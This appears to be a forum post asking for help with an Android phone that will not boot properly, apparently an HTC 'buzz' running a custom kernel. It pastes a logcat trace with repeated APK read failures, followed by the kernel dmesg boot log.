GC_EXPLICIT freed <1K, 49% free 2660K/5123K, external 0K/0K, paused 66ms
[ 12-15 19:33:10.819 164:0xa4 D/dalvikvm ]
GC_EXPLICIT freed <1K, 49% free 2660K/5123K, external 0K/0K, paused 66ms
[ 12-15 19:33:10.839 164:0xa4 I/dalvikvm ]
System server process 222 has been created
[ 12-15 19:33:10.839 164:0xa4 I/Zygote ]
Accepting command socket connections
[ 12-15 19:33:11.239 222:0xde I/sysproc ]
Entered system_init()
[ 12-15 19:33:11.239 222:0xde I/sysproc ]
ServiceManager: 0x817f8
[ 12-15 19:33:11.249 222:0xde I/SurfaceFlinger ]
SurfaceFlinger is starting
[ 12-15 19:33:11.249 222:0xde I/SurfaceFlinger ]
dithering enabled
[ 12-15 19:33:11.249 222:0xe6 I/SurfaceFlinger ]
SurfaceFlinger's main thread ready to run. Initializing graphics H/W...
[ 12-15 19:33:11.269 222:0xe6 I/gralloc ]
using (fd=27)
id = msmfb
xres = 240 px
yres = 320 px
xres_virtual = 240 px
yres_virtual = 640 px
bpp = 16
r = 11:5
g = 5:6
b = 0:5
[ 12-15 19:33:11.269 222:0xe6 I/gralloc ]
width = 49 mm (124.408165 dpi)
height = 65 mm (125.046150 dpi)
refresh rate = 60.00 Hz
[ 12-15 19:33:11.279 222:0xe6 D/libEGL ]
egl.cfg not found, using default config
[ 12-15 19:33:11.289 222:0xe6 D/libEGL ]
loaded /system/lib/egl/libGLES_android.so
[ 12-15 19:33:11.309 222:0xe6 I/SurfaceFlinger ]
EGL informations:
[ 12-15 19:33:11.309 222:0xe6 I/SurfaceFlinger ]
# of configs : 8
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
vendor : Android
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
version : 1.4 Android META-EGL
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
extensions: EGL_KHR_image EGL_KHR_image_base EGL_KHR_image_pixmap EGL_KHR_gl_texture_2D_image EGL_KHR_gl_texture_cubemap_image EGL_KHR_gl_renderbuffer_image EGL_ANDROID_image_native_buffer EGL_ANDROID_swap_rectangle EGL_ANDROID_get_render_buffer
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
Client API: OpenGL ES
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
EGLSurface: 5-6-5-0, config=0x0
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
OpenGL informations:
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
vendor : Android
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
renderer : Android PixelFlinger 1.4
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
version : OpenGL ES-CM 1.0
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
extensions: GL_OES_byte_coordinates GL_OES_fixed_point GL_OES_single_precision GL_OES_read_format GL_OES_compressed_paletted_texture GL_OES_draw_texture GL_OES_matrix_get GL_OES_query_matrix GL_OES_EGL_image GL_OES_compressed_ETC1_RGB8_texture GL_ARB_texture_compression GL_ARB_texture_non_power_of_two GL_ANDROID_user_clip_plane GL_ANDROID_vertex_buffer_object GL_ANDROID_generate_mipmap
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
GL_MAX_TEXTURE_SIZE = 4096
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
GL_MAX_VIEWPORT_DIMS = 4096
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
flags = 000c0000
[ 12-15 19:33:11.330 222:0xde D/SensorService ]
nuSensorService starting...
[ 12-15 19:33:11.340 169:0xa9 D/AK8973 ]
Compass Start
[ 12-15 19:33:11.390 222:0xde I/SensorService ]
BMA150 3-axis Accelerometer
[ 12-15 19:33:11.390 222:0xde I/SensorService ]
AK8973 3-axis Magnetic field sensor
[ 12-15 19:33:11.390 222:0xde I/SensorService ]
AK8973 Orientation sensor
[ 12-15 19:33:11.390 222:0xde I/SensorService ]
CM3602 Proximity sensor
[ 12-15 19:33:11.400 222:0xde I/SensorService ]
CM3602 Light sensor
[ 12-15 19:33:11.400 222:0xde I/sysproc ]
System server: starting Android runtime.
[ 12-15 19:33:11.400 222:0xde I/sysproc ]
System server: starting Android services.
[ 12-15 19:33:11.410 222:0xeb D/SensorService ]
nuSensorService thread starting...
[ 12-15 19:33:11.420 222:0xde I/SystemServer ]
Entered the Android system server!
[ 12-15 19:33:11.440 222:0xde I/sysproc ]
System server: entering thread pool.
[ 12-15 19:33:11.440 222:0xec I/SystemServer ]
Entropy Service
[ 12-15 19:33:11.500 222:0xec I/SystemServer ]
Power Manager
[ 12-15 19:33:11.520 222:0xec I/SystemServer ]
Activity Manager
[ 12-15 19:33:11.610 222:0xed I/ActivityManager ]
Memory class: 32
[ 12-15 19:33:11.750 232:0xef D/libEGL ]
egl.cfg not found, using default config
[ 12-15 19:33:11.760 232:0xef D/libEGL ]
loaded /system/lib/egl/libGLES_android.so
[ 12-15 19:33:11.790 232:0xef W/zipro ]
Unable to open zip '/data/local/bootanimation.zip': No such file or directory
[ 12-15 19:33:12.010 232:0xef I/ARMAssembler ]
generated scanline__00000077:03010104_00008004_00000000 [ 84 ipp] (103 ins) at [0x4076c1e8:0x4076c384] in 3387451 ns
[ 12-15 19:33:12.130 222:0xed I/UsageStats ]
Deleting usage file : usage-20130830
[ 12-15 19:33:12.270 169:0xa9 D/AK8973 ]
Compass CLOSE
[ 12-15 19:33:12.421 222:0xec I/SystemServer ]
Telephony Registry
[ 12-15 19:33:12.461 222:0xec I/SystemServer ]
Package Manager
[ 12-15 19:33:12.501 167:0xa7 I/installd ]
new connection
[ 12-15 19:33:12.501 222:0xec I/Installer ]
connecting...
[ 12-15 19:33:12.771 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 156K, 47% free 3020K/5639K, external 0K/0K, paused 7ms+22ms
[ 12-15 19:33:13.602 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 314K, 47% free 3239K/6023K, external 0K/0K, paused 22ms+12ms
[ 12-15 19:33:14.733 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 537K, 49% free 3260K/6279K, external 0K/0K, paused 7ms+9ms
[ 12-15 19:33:16.014 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:16.124 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 272K, 46% free 3423K/6279K, external 0K/0K, paused 8ms+49ms
[ 12-15 19:33:16.715 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:16.785 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:16.875 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:16.965 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:17.746 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:18.136 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:18.336 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:18.446 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 164K, 42% free 3694K/6343K, external 0K/0K, paused 7ms+20ms
[ 12-15 19:33:18.466 222:0xec W/PackageParser ]
No actions in intent filter at /system/app/Bluetooth.apk Binary XML file line #132
[ 12-15 19:33:18.466 222:0xec W/PackageParser ]
No actions in intent filter at /system/app/Bluetooth.apk Binary XML file line #154
[ 12-15 19:33:18.667 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:18.847 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:19.167 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:19.387 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:19.507 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:19.888 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:20.138 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:20.388 222:0xec I/PackageManager ]
Package com.android.vending at /system/app/Vending.apk ignored: updated version 80230011 better than this 8007003
[ 12-15 19:33:20.779 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:21.600 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 275K, 42% free 3934K/6727K, external 0K/0K, paused 7ms+38ms
[ 12-15 19:33:21.630 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:21.760 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:22.811 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:23.071 222:0xec I/PackageManager ]
Package com.noshufou.android.su at /system/app/Superuser.apk ignored: updated version 46 better than this 38
[ 12-15 19:33:23.081 222:0xec D/PackageManager ]
No files in app dir /vendor/app
[ 12-15 19:33:23.231 222:0xec D/asset ]
failed to open Zip archive '/data/app/com.nuance.swype.trial-1.apk'
[ 12-15 19:33:23.231 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/com.nuance.swype.trial-1.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:23.321 222:0xec W/PackageManager ]
Package mobi.infolife.uninstaller desires unavailable shared library com.sec.android.app.multiwindow; ignoring!
[ 12-15 19:33:23.531 222:0xec W/ResourceType ]
Failure getting entry for 0x7f09002b (t=8 e=43) in package 0 (error -75)
[ 12-15 19:33:23.992 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 300K, 41% free 4064K/6855K, external 0K/0K, paused 20ms+27ms
[ 12-15 19:33:24.042 222:0xec D/asset ]
failed to open Zip archive '/data/app/com.google.android.gms-2.apk'
[ 12-15 19:33:24.062 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/com.google.android.gms-2.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:24.132 222:0xec D/asset ]
failed to open Zip archive '/data/app/netgenius.bizcal-1.apk'
[ 12-15 19:33:24.132 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/netgenius.bizcal-1.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:24.352 222:0xec W/ResourceType ]
Failure getting entry for 0x7f050000 (t=4 e=0) in package 0 (error -75)
[ 12-15 19:33:24.392 222:0xec D/asset ]
failed to open Zip archive '/data/app/com.googlecode.droidwall.free-1.apk'
[ 12-15 19:33:24.402 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/com.googlecode.droidwall.free-1.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:24.412 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:24.522 222:0xec D/asset ]
failed to open Zip archive '/data/app/com.ruimaninfo.approtect-1.apk'
[ 12-15 19:33:24.532 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/com.ruimaninfo.approtect-1.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:24.783 222:0xec D/asset ]
failed to open Zip archive '/data/app/org.adaway-2.apk'
[ 12-15 19:33:24.793 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/org.adaway-2.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:25.003 222:0xec D/asset ]
failed to open Zip archive '/data/app/com.modoohut.dialer.theme.dark-1.apk'
[ 12-15 19:33:25.013 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/com.modoohut.dialer.theme.dark-1.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:25.013 222:0xec D/asset ]
failed to open Zip archive '/data/app/com.buak.Link2SD-2.apk'
[ 12-15 19:33:25.023 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/com.buak.Link2SD-2.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
Is there any chance someone can explain what's going wrong and help me to get it running again ?
I will really appreciate that.
dmseg log
Code:
<6>[ 0.000000] Initializing cgroup subsys cpu
<5>[ 0.000000] Linux version 2.6.35.14-SympFinity+ ([email protected]) (gcc version 4.4.3 (GCC) ) #40 PREEMPT Wed May 2 14:11:03 CEST 2012
<4>[ 0.000000] CPU: ARMv6-compatible processor [4117b362] revision 2 (ARMv6TEJ), cr=00c5387f
<4>[ 0.000000] CPU: VIPT aliasing data cache, VIPT aliasing instruction cache
<4>[ 0.000000] Machine: buzz
<7>[ 0.000000] find the smi tag
<7>[ 0.000000] parse_tag_smi: smi size = 0
<7>[ 0.000000] find the hwid tag
<7>[ 0.000000] parse_tag_hwid: hwid = 0x1
<7>[ 0.000000] find the skuid tag
<7>[ 0.000000] parse_tag_skuid: hwid = 0x2490b
<7>[ 0.000000] tag_panel_parsing: panel type = 0
<7>[ 0.000000] find the engineer tag
<7>[ 0.000000] parse_tag_engineerid: 0x0
<4>[ 0.000000] Ignoring unrecognised tag 0x4d534d76
<4>[ 0.000000] Ignoring unrecognised tag 0x5441000a
<6>[ 0.000000] CAM_AWB_CAL Data size = 514 , 0x59504550, size = 2048
<4>[ 0.000000] Ignoring unrecognised tag 0x41387898
<4>[ 0.000000] BT Data size= 4, 0x43294329,d4,20,6d,94,70,72,00,00,Memory policy: ECC disabled, Data cache writeback
<7>[ 0.000000] On node 0 totalpages: 82432
<7>[ 0.000000] free_area_init_node: node 0, pgdat c052ed50, node_mem_map c06d2000
<7>[ 0.000000] Normal zone: 1156 pages used for memmap
<7>[ 0.000000] Normal zone: 0 pages reserved
<7>[ 0.000000] Normal zone: 81276 pages, LIFO batch:15
<4>[ 0.000000] buzz_init_map_io()
<4>[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 81276
<5>[ 0.000000] Kernel command line: board_buzz.disable_uart3=0 board_buzz.usb_h2w_sw=0 board_buzz.disable_sdcard=0 diag.enabled=0 board_buzz.debug_uart=0 smisize=0 userdata_sel=0 androidboot.emmc=false androidboot.baseband=3.35.20.10 androidboot.cid=11111111 androidboot.batt_poweron=good_battery androidboot.carrier=ALL androidboot.mid=PC4910000 androidboot.keycaps=qwerty androidboot.mode=normal androidboot.serialno=MB139PY05248 androidboot.bootloader=6.01.1002 zygote_oneshot=off no_console_suspend=1 console=null mtdparts=msm_nand:[email protected](misc),[email protected](recovery),[email protected](boot),[email protected]40000(system),[email protected](cache),[email protected](userdata)
<6>[ 0.000000] board_bootloader_setup: 6.01.1002
<6>[ 0.000000] board_bootloader_setup: default ENG BUILD
<6>[ 0.000000] PID hash table entries: 2048 (order: 1, 8192 bytes)
<6>[ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
<6>[ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
<6>[ 0.000000] Memory: 210MB 112MB = 322MB total
<5>[ 0.000000] Memory: 319632k/319632k available, 10096k reserved, 0K highmem
<5>[ 0.000000] Virtual kernel memory layout:
<5>[ 0.000000] vector : 0xffff0000 - 0xffff1000 ( 4 kB)
<5>[ 0.000000] fixmap : 0xfff00000 - 0xfffe0000 ( 896 kB)
<5>[ 0.000000] DMA : 0xffa00000 - 0xffe00000 ( 4 MB)
<5>[ 0.000000] vmalloc : 0xe4800000 - 0xf8000000 ( 312 MB)
<5>[ 0.000000] lowmem : 0xc0000000 - 0xe4200000 ( 578 MB)
<5>[ 0.000000] modules : 0xbf000000 - 0xc0000000 ( 16 MB)
<5>[ 0.000000] .init : 0xc0008000 - 0xc002c000 ( 144 kB)
<5>[ 0.000000] .text : 0xc002c000 - 0xc04f6000 (4904 kB)
<5>[ 0.000000] .data : 0xc04f6000 - 0xc052f360 ( 229 kB)
<6>[ 0.000000] NR_IRQS:277
<4>[ 0.000000] buzz_init_irq()
<6>[ 0.000000] Calibrating delay loop... 480.05 BogoMIPS (lpj=2400256)
<6>[ 0.250122] pid_max: default: 32768 minimum: 301
<4>[ 0.250579] Mount-cache hash table entries: 512
<6>[ 0.251434] Initializing cgroup subsys cpuacct
<6>[ 0.251525] Initializing cgroup subsys freezer
<6>[ 0.251525] Initializing cgroup subsys net_cls
<6>[ 0.251556] Initializing cgroup subsys bfqio
<6>[ 0.251586] Initializing cgroup subsys timer_slack
<6>[ 0.251647] CPU: Testing write buffer coherency: ok
<6>[ 0.256469] NET: Registered protocol family 16
<4>[ 0.257446] buzz_init() revision = 0x81
<6>[ 0.257507] BT HW address=d4:20:6d:94:70:72
<6>[ 1.876647] acpu_clock_init()
<6>[ 1.877136] ACPU running at 480000 KHz
<6>[ 1.878387] ram_console: got buffer at 2d9b000, size 20000
<6>[ 1.878936] ram_console: uncorrectable error in header
<6>[ 1.879028] ram_console: no valid data in buffer (sig = 0xffffffff)
<6>[ 1.905426] console [ram-1] enabled
<6>[ 1.905761] buzz_init_mmc
<6>[ 1.908264] buzz_wifi_init: start
<4>[ 1.919372] bio: create slab <bio-0> at 0
<6>[ 1.922119] [DISP]mdp_probe: initialized
<6>[ 1.922943] msm_i2c_probe
<6>[ 1.923492] msm_i2c_probe: clk_ctl 315, 400000 Hz
<6>[ 1.927551] Bluetooth: Core ver 2.16
<6>[ 1.928070] NET: Registered protocol family 31
<6>[ 1.928375] Bluetooth: HCI device and connection manager initialized
<6>[ 1.928924] Bluetooth: HCI socket layer initialized
<6>[ 1.929229] Bluetooth: L2CAP socket layer initialized
<6>[ 1.930267] Bluetooth: SCO socket layer initialized
<6>[ 1.931182] Switching to clocksource gp_timer
<6>[ 1.934631] NET: Registered protocol family 2
<6>[ 1.935455] IP route cache hash table entries: 4096 (order: 2, 16384 bytes)
<6>[ 1.937103] TCP established hash table entries: 16384 (order: 5, 131072 bytes)
<6>[ 1.938598] TCP bind hash table entries: 16384 (order: 4, 65536 bytes)
<6>[ 1.939666] TCP: Hash tables configured (established 16384 bind 16384)
<6>[ 1.940216] TCP reno registered
<6>[ 1.940521] UDP hash table entries: 256 (order: 0, 4096 bytes)
<6>[ 1.940856] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
<6>[ 1.942077] NET: Registered protocol family 1
<6>[ 1.943023] Unpacking initramfs...
<6>[ 1.975341] Freeing initrd memory: 144K
<6>[ 1.976989] [SMD]smd_init()
<6>[ 1.977294] [SMD]smd_core_init()
<6>[ 1.977600] [SMD]phy addr of smd_info.state=0x8023A0
<6>[ 1.978302] [SMD]smd_core_init() done
<3>[ 1.978607] msm_init_last_radio_log: could not retrieve SMEM_CLKREGIM_BSP
<3>[ 1.979278] _smem_log_init: no power log or log_idx allocated, smem_log disabled
<6>[ 1.980804] [SMD]smd_alloc_channel() cid=01 size=08192 'SMD_DIAG'
<6>[ 1.981658] [SMD]smd_alloc_channel() cid=02 size=08192 'SMD_RPCCALL'
<6>[ 1.984985] [SMD]SMD: ch 2 0 -> 1
<6>[ 1.985382] [SMD]smd_alloc_channel() cid=11 size=65536 'SMD_DATA5'
<6>[ 1.985687] [SMD]SMD: ch 2 1 -> 2
<6>[ 1.986602] [SMD]smd_alloc_channel() cid=12 size=08192 'SMD_DATA6'
<6>[ 1.987152] [SMD]smd_alloc_channel() cid=13 size=08192 'SMD_DATA7'
<6>[ 1.987884] [SMD]smd_alloc_channel() cid=38 size=08192 'SMD_DATA5_CNTL'
<6>[ 1.988342] [SMD]smd_alloc_channel() cid=39 size=08192 'SMD_DATA6_CNTL'
<6>[ 1.989044] [SMD]smd_alloc_channel() cid=40 size=08192 'SMD_DATA7_CNTL'
<6>[ 1.996368] Acquire 'boot-time' no_halt_lock 60s
<6>[ 1.997589] [HS_MGR] (headset_notifier_register) Register MIC_BIAS notifier
<6>[ 1.998138] [HS_MGR] (headset_notifier_update) HS_MGR driver is not ready
<7>[ 2.018249] Registered led device: flashlight
<6>[ 2.018585] [FLT]flashlight_probe: led_count = 0
<6>[ 2.019104] [FLT]flashlight_probe: The Flashlight Driver is ready
<6>[ 2.029968] atmega-microp 0-0066: microp version [06][22]
<3>[ 2.034484] microp_function_check: No function 2 !!
<6>[ 2.038024] [HS_MGR] (htc_headset_mgr_probe) ++++++++++++++++++++
<6>[ 2.040222] input: h2w headset as /devices/virtual/input/input0
<6>[ 2.041198] [HS_MGR] (hs_notify_driver_ready) HS_MGR ready
<6>[ 2.042266] [HS_MGR] (htc_headset_mgr_probe) --------------------
<6>[ 2.043060] [HS_MICROP] (htc_headset_microp_probe) ++++++++++++++++++++
<6>[ 2.047729] [HS_MGR] (headset_notifier_register) Register REMOTE_ADC notifier
<6>[ 2.048309] [HS_MGR] (headset_notifier_register) Register MIC_STATUS notifier
<6>[ 2.048614] [HS_MGR] (headset_notifier_register) Register KEY_INT_ENABLE notifier
<6>[ 2.049133] [HS_MGR] (hs_notify_driver_ready) HS_MICROP ready
<6>[ 2.049865] [HS_GPIO] (htc_headset_gpio_probe) ++++++++++++++++++++
<6>[ 2.051300] [HS_MGR] (headset_notifier_register) Register HPIN_GPIO notifier
<6>[ 2.052032] [HS_MGR] (hs_notify_driver_ready) HS_GPIO ready
<6>[ 2.052368] [HS_GPIO] (htc_headset_gpio_probe) --------------------
<6>[ 2.052917] [HS_MICROP] (htc_headset_microp_probe) --------------------
<6>[ 2.080139] [BATT] M2A_RPC: cable_update: USB at 458867027 (1970-01-01 00:00:00.458257102 UTC)
<6>[ 2.081024] [BATT] htc_cable_status_update: 0 -> 1
<6>[ 2.081329] [USB] msm_hsusb_set_vbus_state: 1
<6>[ 2.083099] ashmem: initialized
<6>[ 2.084472] [BATT] A2M_RPC: get_batt_info: batt_id=1, batt_vol=3893, batt_temp=309, batt_current=1017, level=72, charging_source=1, charging_enabled=1, full_bat=1300000, over_vchg=0 at 463716046 (1970-01-01 00:00:00.462557151 UTC)
<5>[ 2.087890] Slow work thread pool: Starting up
<5>[ 2.101501] Slow work thread pool: Ready
<6>[ 2.102264] fuse init (API version 7.14)
<6>[ 2.104644] aufs 2.1-standalone.tree-35-20110418
<4>[ 2.104980] yaffs May 2 2012 14:03:42 Installing.
<6>[ 2.116912] io scheduler noop registered
<6>[ 2.117492] io scheduler bfq registered
<6>[ 2.118041] io scheduler sio registered (default)
<6>[ 2.118316] io scheduler vr registered
<6>[ 2.119354] [DISP]mddi: init() base=0xe4814000 irq=16
<7>[ 2.120178] [DISP]mddi runs at 81920000
<6>[ 2.122161] [DISP]mddi cmd send rtd: int 3a000, stat 8063, rtd val 10
<6>[ 2.125061] [DISP]mddi: registering panel mddi_c_0101_04d1
<6>[ 2.125366] [DISP]mddi: publish:
<7>[ 2.128784] [DISP]mddi_s6d04d1_probe: enter.
<6>[ 2.129547] [DISP]vsync on gpio 97 now 0
<6>[ 2.129852] [DISP]CABC enabled
<7>[ 2.131408] Registered led device: lcd-backlight
<6>[ 2.133544] [DISP]msmfb_probe() installing 240 x 320 panel
<6>[ 2.137268] PRUE G
<6>[ 2.137908] msm_serial_hs.0: ttyHS0 at MMIO 0xa0200000 (irq = 45) is a MSM HS UART
<6>[ 2.139251] msm_serial_hs module loaded
<6>[ 2.139923] [BT]msm_serial_hs module loaded
<6>[ 2.141357] [BT]msm_serial_hs module loaded
<6>[ 2.142852] [BT]msm_serial_hs module loaded
<6>[ 2.149993] loop: module loaded
<6>[ 2.150695] pmem: 1 init
<6>[ 2.151824] pmem_adsp: 0 init
<6>[ 2.153259] pmem_camera: 0 init
<6>[ 2.155090] spi_bma150_probe: G-sensor connect with microP: start initial, kvalue = 0x0
<6>[ 2.165435] [GSNR] Gsensor disable
<6>[ 2.167724] msm_nand: allocated dma buffer at ffa47000, dma_addr 26ecc000
<6>[ 2.168334] status: c03120
<6>[ 2.168640] nandid: 5500bcec maker ec device bc
<6>[ 2.169158] Found a supported NAND device
<6>[ 2.169433] NAND Id : 0xBCEC
<6>[ 2.169738] Buswidth : 16 Bits
<6>[ 2.170257] Density : 512 MByte
<6>[ 2.170532] Pagesize : 2048 Bytes
<6>[ 2.170806] Erasesize: 131072 Bytes
<6>[ 2.171295] Oobsize : 64 Bytes
<6>[ 2.171691] msm_nand: read CFG0 = aa5400c0, CFG1 = 8746a
<6>[ 2.172149] CFG0 Init : 0xe85408c0
<6>[ 2.172668] CFG1 Init : 0x0008746a
<6>[ 2.172943] CFG0: cw/page=3 ud_sz=516 ecc_sz=10 spare_sz=0 num_addr_cycles=5
<6>[ 2.173553] DEV_CMD1: f00f3000
<6>[ 2.173889] <6>NAND_EBI2_ECC_BUF_CFG: 1ff
<5>[ 2.174255] 6 cmdlinepart partitions found on MTD device msm_nand
<5>[ 2.174774] Creating 6 MTD partitions on "msm_nand":
<5>[ 2.175140] 0x00001ff60000-0x000020000000 : "misc"
<5>[ 2.178192] 0x000002760000-0x000002b80000 : "recovery"
<5>[ 2.184356] 0x000002b80000-0x000002e40000 : "boot"
<5>[ 2.189056] 0x000002e40000-0x000009c40000 : "system"
<6>[ 2.214324] [SMD]smd_alloc_channel() cid=27 size=08192 'SMD_GPSNMEA'
<5>[ 2.324920] 0x000009c40000-0x00000ab40000 : "cache"
<6>[ 2.337524] [SMD]smd_alloc_channel() cid=00 size=08192 'SMD_DS'
<6>[ 2.338500] [SMD]smd_alloc_channel() cid=07 size=08192 'SMD_DATA1'
